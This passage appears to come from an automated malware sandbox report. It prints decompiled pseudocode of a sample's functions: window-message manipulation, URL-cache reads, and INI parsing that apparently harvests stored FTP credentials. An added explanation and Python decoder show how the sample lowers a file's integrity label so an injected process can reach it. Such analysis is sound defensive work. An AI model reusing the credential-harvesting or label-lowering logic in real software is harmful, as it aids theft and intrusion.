    • Instruction Fuzzy Hash: EE0131B568024CBFDB119FE08D85FEF7B7CAF04785F000166F641F11A1D6759E949A28
    Uniqueness

    Uniqueness Score: -1.00%
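
Two of the functions above work with Windows integrity levels. E00417AFC opens the process token, queries TokenIntegrityLevel (class 0x19), takes the last sub-authority of the returned SID and compares it with 0x2000, the Medium RID, returning 3 at or above Medium and 1 below. E00419A29 goes the other way: it converts the SDDL string `S:(ML;CIOI;NRNWNX;;;LW)` into a security descriptor, extracts its SACL and applies it with SetNamedSecurityInfoW(path, 1, 0x10, ...), i.e. SE_FILE_OBJECT with LABEL_SECURITY_INFORMATION. The label it installs is Low (LW) with the no-read-up, no-write-up and no-execute-up policies, inheritable to children (CI, OI). Since mandatory integrity control only restricts subjects whose level is below the object's label, dropping the label to Low lets a Low-integrity process, such as a protected-mode browser the sample has injected into, read and write the file, while a Medium or higher process is unaffected. The decoder below is an added example for this report, not code from the sample or from Joe Sandbox; the RID values, ACE flag names and policy bits are the Win32 definitions, and the subject levels fed to it are chosen for illustration.

```python
"""Decode the mandatory-label SACL applied in E00419A29 and reproduce the token
integrity threshold used in E00417AFC.  Added example for this report; not code
from the sample or from Joe Sandbox."""
import re
from dataclasses import dataclass
from typing import Tuple

# SDDL aliases for mandatory-label SIDs (S-1-16-<RID>).
LABEL_RIDS = {
    "LW": 0x1000,  # SECURITY_MANDATORY_LOW_RID        (protected-mode browser)
    "ME": 0x2000,  # SECURITY_MANDATORY_MEDIUM_RID     (ordinary user process)
    "MP": 0x2100,  # SECURITY_MANDATORY_MEDIUM_PLUS_RID
    "HI": 0x3000,  # SECURITY_MANDATORY_HIGH_RID       (elevated administrator)
    "SI": 0x4000,  # SECURITY_MANDATORY_SYSTEM_RID
}
ACE_FLAGS = {"CI": "CONTAINER_INHERIT_ACE", "OI": "OBJECT_INHERIT_ACE",
             "NP": "NO_PROPAGATE_INHERIT_ACE", "IO": "INHERIT_ONLY_ACE",
             "ID": "INHERITED_ACE"}
# Mandatory-label policy bits carried in the ACE's access-mask field:
# SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / NO_READ_UP / NO_EXECUTE_UP.
LABEL_POLICY = {"NW": 0x1, "NR": 0x2, "NX": 0x4}
SECURITY_MANDATORY_MEDIUM_RID = 0x2000

_ACE_RE = re.compile(r"\(([^()]*)\)")


@dataclass(frozen=True)
class MandatoryLabel:
    flags: Tuple[str, ...]
    policy: int
    rid: int


def _pairs(tokens: str) -> Tuple[str, ...]:
    """SDDL packs two-letter tokens back to back ("CIOI" -> CI, OI)."""
    if len(tokens) % 2:
        raise ValueError(f"odd-length SDDL token list: {tokens!r}")
    return tuple(tokens[i:i + 2] for i in range(0, len(tokens), 2))


def label_rid(sid: str) -> int:
    """Accept an SDDL alias (LW, ME, ...) or a full S-1-16-<rid> string."""
    if sid in LABEL_RIDS:
        return LABEL_RIDS[sid]
    m = re.fullmatch(r"S-1-16-(\d+)", sid)
    if not m:
        raise ValueError(f"not a mandatory-label SID: {sid!r}")
    return int(m.group(1))


def parse_label_sacl(sddl: str) -> MandatoryLabel:
    """Parse the single ML ACE out of an 'S:(...)' SACL string."""
    if not sddl.startswith("S:"):
        raise ValueError("expected a SACL string starting with 'S:'")
    found = []
    for body in _ACE_RE.findall(sddl[2:]):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"an ACE has six ';'-separated fields: {body!r}")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        if ace_type != "ML":
            continue                      # only mandatory-label ACEs matter here
        flag_tokens = _pairs(flags)
        unknown = [f for f in flag_tokens if f not in ACE_FLAGS]
        if unknown:
            raise ValueError(f"unknown ACE flags {unknown}")
        policy = 0
        for tok in _pairs(rights):
            policy |= LABEL_POLICY[tok]   # KeyError for a non-label right
        found.append(MandatoryLabel(flag_tokens, policy, label_rid(sid)))
    if len(found) != 1:
        raise ValueError(f"expected one mandatory-label ACE, found {len(found)}")
    return found[0]


def can_write_up(subject_rid: int, label: MandatoryLabel) -> bool:
    """Mandatory integrity control: a subject below the object's label is denied
    write access only when the label carries NW; at or above the label it adds
    no restriction (the discretionary ACL still applies and is not modelled)."""
    if subject_rid >= label.rid:
        return True
    return not (label.policy & LABEL_POLICY["NW"])


def sample_integrity_code(token_rid: int) -> int:
    """E00417AFC compares the last sub-authority of the token's integrity SID with
    0x2000 and returns 3 at Medium or above, 1 below it."""
    return 3 if token_rid >= SECURITY_MANDATORY_MEDIUM_RID else 1


if __name__ == "__main__":
    label = parse_label_sacl("S:(ML;CIOI;NRNWNX;;;LW)")   # string from the sample
    print(label)
    for name in ("LW", "ME", "HI"):
        print(f"{name} subject may write: {can_write_up(LABEL_RIDS[name], label)}")
    print("sample's code for a Low token:", sample_integrity_code(LABEL_RIDS["LW"]))
```

Checking the same thing on a host needs no decoding: the label on a file is visible with `icacls <file>` (it prints a `Mandatory Label\Low Mandatory Level` entry), and a Low label on a file in a user's profile that a Medium process wrote is the artifact this function leaves behind.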

    C-Code - Quality: 77%
    			E0040D091(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				signed int _t47;
    				signed short _t58;
    				int _t65;
    				signed int _t66;
    				signed short _t75;
    				void* _t79;
    
    				_t70 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t65 = GetAncestor(_a4, 2);
    					if(_t65 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t70 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t65;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t66 = _a12 & 0x0000ffff;
    					_v8 = _t66;
    					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
    					if(_a12 != 1) {
    						_t47 = E0040CFB2(_t70, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t66 - 8;
    						if(__eflags > 0) {
    							__eflags = _t66 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t66);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t66 - 0x11;
    							if(_t66 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E0040CE22(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t66 - 0x14;
    							if(_t66 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t66 - 0x15;
    							if(_t66 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t66 - 2;
    						if(_t66 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t66 - 3;
    						if(_t66 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t66 - 5;
    						if(_t66 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t66 - 6 - 1;
    						if(_t66 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E0040CE22(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t66 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t58 = E0040801F(0, _t79, 0);
    					_push(_a24);
    					_push(_t58 & 0x0000ffff);
    					_t47 = E0040CFB2(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}

    0x0040d091
    0x0040d094
    0x0040d098
    0x0040d09b
    0x0040d0a3
    0x0040d0c0
    0x0040d0c8
    0x00000000
    0x00000000
    0x0040d0ca
    0x0040d0e5
    0x0040d0ed
    0x0040d103
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040d109
    0x0040d109
    0x0040d109
    0x0040d11f
    0x0040d127
    0x0040d12e
    0x0040d159
    0x0040d15e
    0x0040d161
    0x0040d164
    0x0040d27b
    0x0040d27e
    0x0040d2c3
    0x0040d2c8
    0x0040d2f3
    0x0040d2f8
    0x0040d212
    0x0040d216
    0x0040d216
    0x0040d2fe
    0x0040d300
    0x0040d300
    0x0040d303
    0x00000000
    0x00000000
    0x0040d309
    0x0040d30c
    0x0040d201
    0x0040d201
    0x0040d207
    0x0040d208
    0x0040d20d
    0x0040d210
    0x00000000
    0x0040d210
    0x0040d312
    0x0040d312
    0x0040d315
    0x0040d318
    0x00000000
    0x0040d318
    0x0040d2cd
    0x0040d2d0
    0x0040d2d5
    0x00000000
    0x00000000
    0x0040d2e2
    0x0040d2ee
    0x00000000
    0x0040d2ee
    0x0040d280
    0x0040d1cf
    0x0040d1cf
    0x0040d1d2
    0x0040d14d
    0x0040d14d
    0x00000000
    0x0040d14d
    0x0040d286
    0x0040d289
    0x0040d23d
    0x0040d23d
    0x0040d242
    0x0040d256
    0x0040d256
    0x00000000
    0x0040d242
    0x0040d28b
    0x0040d28e
    0x0040d2ae
    0x0040d2b3
    0x0040d1a7
    0x0040d1a7
    0x0040d1ac
    0x0040d1ac
    0x00000000
    0x00000000
    0x00000000
    0x0040d1ae
    0x0040d1fc
    0x0040d1fc
    0x00000000
    0x0040d1fc
    0x0040d290
    0x0040d293
    0x00000000
    0x00000000
    0x0040d299
    0x0040d29e
    0x00000000
    0x00000000
    0x0040d2a4
    0x00000000
    0x0040d2a4
    0x0040d16a
    0x0040d25d
    0x0040d262
    0x00000000
    0x00000000
    0x0040d268
    0x0040d26b
    0x0040d272
    0x00000000
    0x00000000
    0x0040d274
    0x00000000
    0x0040d274
    0x0040d170
    0x0040d173
    0x0040d22b
    0x0040d230
    0x00000000
    0x00000000
    0x0040d232
    0x0040d237
    0x00000000
    0x00000000
    0x00000000
    0x0040d237
    0x0040d179
    0x0040d17c
    0x0040d1f5
    0x0040d1fa
    0x0040d219
    0x0040d21e
    0x00000000
    0x00000000
    0x0040d224
    0x00000000
    0x0040d224
    0x00000000
    0x0040d1fa
    0x0040d17e
    0x0040d181
    0x0040d1d8
    0x0040d1dd
    0x0040d1e8
    0x0040d1ed
    0x00000000
    0x00000000
    0x0040d1ef
    0x0040d1f1
    0x0040d1e3
    0x0040d1e3
    0x00000000
    0x0040d1e3
    0x0040d1df
    0x0040d1e1
    0x00000000
    0x0040d1e1
    0x0040d186
    0x0040d189
    0x00000000
    0x00000000
    0x0040d18b
    0x0040d190
    0x0040d1c4
    0x0040d1c9
    0x0040d1cc
    0x00000000
    0x0040d1cc
    0x0040d192
    0x0040d197
    0x00000000
    0x00000000
    0x0040d199
    0x0040d19e
    0x00000000
    0x00000000
    0x0040d1a0
    0x0040d1a5
    0x00000000
    0x00000000
    0x00000000
    0x0040d1a5
    0x0040d136
    0x0040d13b
    0x0040d141
    0x0040d148
    0x00000000
    0x0040d148

    APIs
    • GetAncestor.USER32(?,00000002), ref: 0040D0BA
    • SendMessageTimeoutW.USER32 ref: 0040D0E5
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 0040D127
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D1BD
    • PostMessageW.USER32(?,00000112,?,?), ref: 0040D210
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D24F
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: 49878a142090244006c251e49161f07209667365ced38fe98a0b07f463ca0886
    • Instruction ID: 198dd98362e5fd40c7db13aeaf45b29576d091dbbe8615e43912838c8c19b01e
    • Opcode Fuzzy Hash: 49878a142090244006c251e49161f07209667365ced38fe98a0b07f463ca0886
    • Instruction Fuzzy Hash: 4A51BF34E00304AAEF345EC8CC89BBE3625EB55310F24447BF951FA2E1C67DC999A65E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040B409(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
    				short _v524;
    				short _v528;
    				char _v568;
    				short _v584;
    				char _v596;
    				short _v600;
    				char _v608;
    				short _v612;
    				char _v616;
    				short _v620;
    				char _v624;
    				short _v628;
    				short* _v632;
    				WCHAR* _v636;
    				WCHAR* _v640;
    				WCHAR* _v644;
    				WCHAR* _v648;
    				WCHAR* _v652;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t54;
    				WCHAR* _t57;
    				void* _t61;
    				void* _t63;
    				void* _t65;
    				void* _t67;
    				void* _t69;
    				WCHAR* _t72;
    				WCHAR* _t74;
    				long _t78;
    				int _t81;
    				long _t85;
    				long _t88;
    				WCHAR* _t89;
    				void* _t90;
    				WCHAR* _t94;
    				WCHAR* _t95;
    				WCHAR* _t111;
    				WCHAR* _t112;
    				WCHAR* _t117;
    				intOrPtr _t126;
    				signed int _t127;
    				void* _t129;
    
    				_t129 = (_t127 & 0xfffffff8) - 0x284;
    				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
    					L21:
    					return 1;
    				}
    				_t132 =  *__edx & 0x00000010;
    				if(( *__edx & 0x00000010) == 0) {
    					_t117 = E00416378(0x1fffe);
    					_v628 = _t117;
    					__eflags = _t117;
    					if(_t117 == 0) {
    						goto L21;
    					}
    					_t54 = GetPrivateProfileStringW(0, 0, 0, _t117, 0xffff,  &_v524);
    					__eflags = _t54;
    					if(_t54 <= 0) {
    						L20:
    						E004163A8(_t117);
    						goto L21;
    					}
    					_t9 =  &(_t54[0]); // 0x1
    					_t57 = E00417258(_t117, _t9);
    					__eflags = _t57;
    					if(_t57 == 0) {
    						goto L20;
    					}
    					_t111 = E00416378(0xc1c);
    					_v640 = _t111;
    					__eflags = _t111;
    					if(_t111 != 0) {
    						_t11 =  &(_t111[0x2fd]); // 0x5fa
    						_v632 = _t11;
    						_v644 = _t117;
    						_t61 = 0x72;
    						E0040FA33(_t61,  &_v584);
    						_t63 = 0x73;
    						E0040FA33(_t63,  &_v596);
    						_t65 = 0x74;
    						E0040FA33(_t65,  &_v608);
    						_t67 = 0x75;
    						E0040FA33(_t67,  &_v624);
    						_t69 = 0x76;
    						E0040FA33(_t69,  &_v616);
    						goto L9;
    						L18:
    						_t74 = E00417294(_v648, 1);
    						_v652 = _t74;
    						__eflags = _t74;
    						if(_t74 != 0) {
    							_t111 = _v644;
    							L9:
    							_t72 = StrStrIW(_v644,  &_v584);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t111, 0xff,  &_v528);
    								__eflags = _t78;
    								if(_t78 != 0) {
    									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
    									_v640 = _t81;
    									__eflags = _t81 - 1 - 0xfffe;
    									if(_t81 - 1 <= 0xfffe) {
    										_t112 =  &(_t111[0xff]);
    										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t112, 0xff,  &_v528);
    										__eflags = _t85;
    										if(_t85 != 0) {
    											_t33 =  &(_t112[0xff]); // 0x0
    											_t124 = _t33;
    											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
    											__eflags = _t88;
    											if(_t88 != 0) {
    												_t89 = E00416EF7(_t124);
    												__eflags = _t89;
    												if(_t89 > 0) {
    													_t125 =  &_v568;
    													_t90 = 0x55;
    													E0040FA33(_t90,  &_v568);
    													_push(_v640);
    													_t38 =  &(_t112[0xff]); // 0x0
    													_push(_v644);
    													_push(_t112);
    													_t113 = _v636;
    													_t94 = E0041709B(_t125, 0x311, _v636, _t125);
    													_t129 = _t129 + 0x14;
    													__eflags = _t94;
    													if(_t94 > 0) {
    														_t126 = _a4;
    														_t95 = E0041679C(_t94, _t126, _t113);
    														__eflags = _t95;
    														if(_t95 != 0) {
    															_t42 = _t126 + 4;
    															 *_t42 =  &(( *(_t126 + 4))[0]);
    															__eflags =  *_t42;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    							goto L18;
    						}
    						E004163A8(_v644);
    						_t117 = _v636;
    					}
    					goto L20;
    				} else {
    					E0040B3D1(_t132,  &_v524, _a4);
    					goto L21;
    				}
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x0040b40f, 0x0040b42d, 0x0040b623, 0x0040b62b, 0x0040b62b, 0x0040b433, 0x0040b436, 0x0040b457,
    0x0040b45b, 0x0040b45f, 0x0040b461, 0x00000000, 0x00000000, 0x0040b47e, 0x0040b480, 0x0040b482,
    0x0040b61d, 0x0040b61e, 0x00000000, 0x0040b61e, 0x0040b488, 0x0040b48d, 0x0040b492, 0x0040b494,
    0x00000000, 0x00000000, 0x0040b4a4, 0x0040b4a6, 0x0040b4aa, 0x0040b4ac, 0x0040b4b2, 0x0040b4ba,
    0x0040b4be, 0x0040b4c6, 0x0040b4c7, 0x0040b4d2, 0x0040b4d3, 0x0040b4de, 0x0040b4df, 0x0040b4ea,
    0x0040b4eb, 0x0040b4f6, 0x0040b4f7, 0x0040b4fc, 0x0040b5f9, 0x0040b5ff, 0x0040b604, 0x0040b608,
    0x0040b60a, 0x0040b4fe, 0x0040b502, 0x0040b50b, 0x0040b511, 0x0040b513, 0x0040b533, 0x0040b535,
    0x0040b537, 0x0040b550, 0x0040b556, 0x0040b55b, 0x0040b560, 0x0040b56f, 0x0040b581, 0x0040b583,
    0x0040b585, 0x0040b590, 0x0040b590, 0x0040b5a2, 0x0040b5a4, 0x0040b5a6, 0x0040b5aa, 0x0040b5af,
    0x0040b5b1, 0x0040b5b5, 0x0040b5b9, 0x0040b5ba, 0x0040b5bf, 0x0040b5c3, 0x0040b5c9, 0x0040b5d3,
    0x0040b5d4, 0x0040b5db, 0x0040b5e0, 0x0040b5e3, 0x0040b5e5, 0x0040b5e7, 0x0040b5ed, 0x0040b5f2,
    0x0040b5f4, 0x0040b5f6, 0x0040b5f6, 0x0040b5f6, 0x0040b5f6, 0x0040b5f4, 0x0040b5e5, 0x0040b5b1,
    0x0040b5a6, 0x0040b585, 0x0040b560, 0x0040b537, 0x00000000, 0x0040b513, 0x0040b614, 0x0040b619,
    0x0040b619, 0x00000000, 0x0040b438, 0x0040b443, 0x00000000, 0x0040b443

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B47E
    • StrStrIW.SHLWAPI(?,?), ref: 0040B50B
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B533
    • GetPrivateProfileIntW.KERNEL32 ref: 0040B550
    • GetPrivateProfileStringW.KERNEL32 ref: 0040B581
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PrivateProfile$String$CombinePath
    • String ID:
    • API String ID: 2134968610-0
    • Opcode ID: b407eab06b79c92b2718c3a96af049aaddf62d2bc0c9616bac5767c8e238d513
    • Instruction ID: 4fdda50b45c44acdabd490307c0ff366f63c859c8d6f016ec9fea7bcaf125901
    • Opcode Fuzzy Hash: b407eab06b79c92b2718c3a96af049aaddf62d2bc0c9616bac5767c8e238d513
    • Instruction Fuzzy Hash: 92518632504706ABDA10DB55DC01FEBB7E8EF84708F00493EB988E3291DB79D949879A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407421(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, void _a12, struct _GOPHER_FIND_DATAA _a16) {
    				char _v5;
    				char _v12;
    				signed int _v16;
    				char _v20;
    				char _v24;
    				long _v28;
    				void* __edi;
    				void* __esi;
    				signed int _t55;
    				void* _t58;
    				struct _GOPHER_FIND_DATAA _t59;
    				intOrPtr _t60;
    				struct _GOPHER_FIND_DATAA _t61;
    				struct _GOPHER_FIND_DATAA _t62;
    				signed int _t71;
    				struct _GOPHER_FIND_DATAA _t79;
    				struct _GOPHER_FIND_DATAA _t84;
    				int _t89;
    				struct _GOPHER_FIND_DATAA _t91;
    				void* _t96;
    				intOrPtr* _t99;
    				struct _GOPHER_FIND_DATAA _t103;
    				struct _GOPHER_FIND_DATAA _t107;
    
    				_v16 = _v16 | 0xffffffff;
    				EnterCriticalSection(0x4228c0);
    				_t99 = _a4;
    				_t55 = E00406C86( *_t99);
    				if(_t55 == 0xffffffff) {
    					L33:
    					LeaveCriticalSection(0x4228c0);
    					return _v16;
    				}
    				_t58 = _t55 * 0x24 +  *0x4228d8;
    				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
    					goto L33;
    				}
    				_t96 = _t58;
    				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
    					_t59 = _a16;
    					__eflags = _t59;
    					if(_t59 != 0) {
    						 *_t59 =  *_t59 & 0x00000000;
    						__eflags =  *_t59;
    					}
    					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
    					if(__eflags != 0) {
    						L22:
    						_t60 =  *((intOrPtr*)(_t96 + 0x18));
    						__eflags = _t60 - 0xffffffff;
    						if(_t60 != 0xffffffff) {
    							__eflags = _v16 - 0xffffffff;
    							if(_v16 == 0xffffffff) {
    								_t61 = _t60 -  *(_t96 + 0x1c);
    								__eflags = _t61;
    								_t103 = _t61;
    								if(_t61 != 0) {
    									__eflags = _a8;
    									if(_a8 == 0) {
    										_a12 = E0041772D(0x2000, 0x1000);
    									}
    									__eflags = _a12 - _t103;
    									_t103 =  <  ? _a12 : _t103;
    									__eflags = _a8;
    									if(_a8 != 0) {
    										E004163E4(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
    										_t50 = _t96 + 0x1c;
    										 *_t50 =  *(_t96 + 0x1c) + _t103;
    										__eflags =  *_t50;
    									}
    								}
    								_t62 = _a16;
    								__eflags = _t62;
    								if(_t62 != 0) {
    									 *_t62 = _t103;
    								}
    								_v16 = 1;
    							}
    						}
    						goto L32;
    					}
    					LeaveCriticalSection(0x4228c0);
    					_v5 = E00407308( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
    					EnterCriticalSection(0x4228c0);
    					__eflags = _v5;
    					if(_v5 == 0) {
    						L21:
    						_t37 =  &_v16;
    						 *_t37 = _v16 & 0x00000000;
    						__eflags =  *_t37;
    						SetLastError(0x2ee4);
    						goto L22;
    					}
    					_t105 =  *_a4;
    					_t71 = E00406C86( *_a4);
    					__eflags = _t71 - 0xffffffff;
    					if(_t71 == 0xffffffff) {
    						E004163A8(_v12);
    						goto L21;
    					}
    					_t96 = _t71 * 0x24 +  *0x4228d8;
    					_t101 = E004184DE( &_v24, _t105);
    					_t79 = E00414E0E( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L19:
    						E004163A8(_t101);
    						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
    						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
    						goto L22;
    					}
    					_t84 = E004165E8(_v24, 0, _t101);
    					_a4 = _t84;
    					__eflags = _t84;
    					if(_t84 == 0) {
    						goto L19;
    					}
    					_v28 = 0x1000;
    					_t107 = E00416378(0x1000);
    					__eflags = _t107;
    					if(_t107 == 0) {
    						L18:
    						E004163A8(_a4);
    						goto L19;
    					}
    					 *_t107 = 0x50;
    					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
    					__eflags = _t89;
    					if(_t89 != 0) {
    						_t91 =  *(_t107 + 8);
    						__eflags = _t91;
    						if(_t91 != 0) {
    							__eflags =  *_t91;
    							if( *_t91 != 0) {
    								E0041B55A(_t91, _v12, _v20);
    							}
    						}
    					}
    					E004163A8(_t107);
    					goto L18;
    				} else {
    					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
    					L32:
    					goto L33;
    				}
    			}

    Instruction addresses (one per statement line of the C-Code above, in order; 0x00000000 marks a line with no instruction of its own, such as a label, goto, break or continue):
    0x00407427, 0x00407432, 0x00407438, 0x0040743d, 0x00407445, 0x004075f0, 0x004075f5, 0x00407601,
    0x00407601, 0x0040744e, 0x00407458, 0x00000000, 0x00000000, 0x0040745f, 0x00407465, 0x00407479,
    0x0040747c, 0x0040747e, 0x00407480, 0x00407480, 0x00407480, 0x00407483, 0x00407487, 0x00407592,
    0x00407592, 0x00407595, 0x00407598, 0x0040759a, 0x0040759e, 0x004075a0, 0x004075a0, 0x004075a3,
    0x004075a5, 0x004075a7, 0x004075ab, 0x004075bc, 0x004075bc, 0x004075bf, 0x004075c2, 0x004075c6,
    0x004075ca, 0x004075d7, 0x004075dc, 0x004075dc, 0x004075dc, 0x004075dc, 0x004075ca, 0x004075df,
    0x004075e2, 0x004075e4, 0x004075e6, 0x004075e6, 0x004075e8, 0x004075e8, 0x0040759e, 0x00000000,
    0x00407598, 0x00407495, 0x004074af, 0x004074b2, 0x004074b8, 0x004074bc, 0x00407583, 0x00407583,
    0x00407583, 0x00407583, 0x0040758c, 0x00000000, 0x0040758c, 0x004074c5, 0x004074c7, 0x004074cc,
    0x004074cf, 0x0040757e, 0x00000000, 0x0040757e, 0x004074e2, 0x004074ec, 0x004074fa, 0x004074ff,
    0x00407501, 0x00407567, 0x00407568, 0x00407570, 0x00407576, 0x00000000, 0x00407576, 0x00407509,
    0x0040750e, 0x00407511, 0x00407513, 0x00000000, 0x00000000, 0x0040751a, 0x00407522, 0x00407524,
    0x00407526, 0x0040755f, 0x00407562, 0x00000000, 0x00407562, 0x00407530, 0x00407536, 0x0040753c,
    0x0040753e, 0x00407540, 0x00407543, 0x00407545, 0x00407547, 0x0040754b, 0x00407554, 0x00407554,
    0x0040754b, 0x00407545, 0x0040755a, 0x00000000, 0x0040746f, 0x00407472, 0x004075ef, 0x00000000,
    0x004075ef

    APIs
    • EnterCriticalSection.KERNEL32(004228C0), ref: 00407432
    • LeaveCriticalSection.KERNEL32(004228C0), ref: 00407495
    • EnterCriticalSection.KERNEL32(004228C0), ref: 004074B2
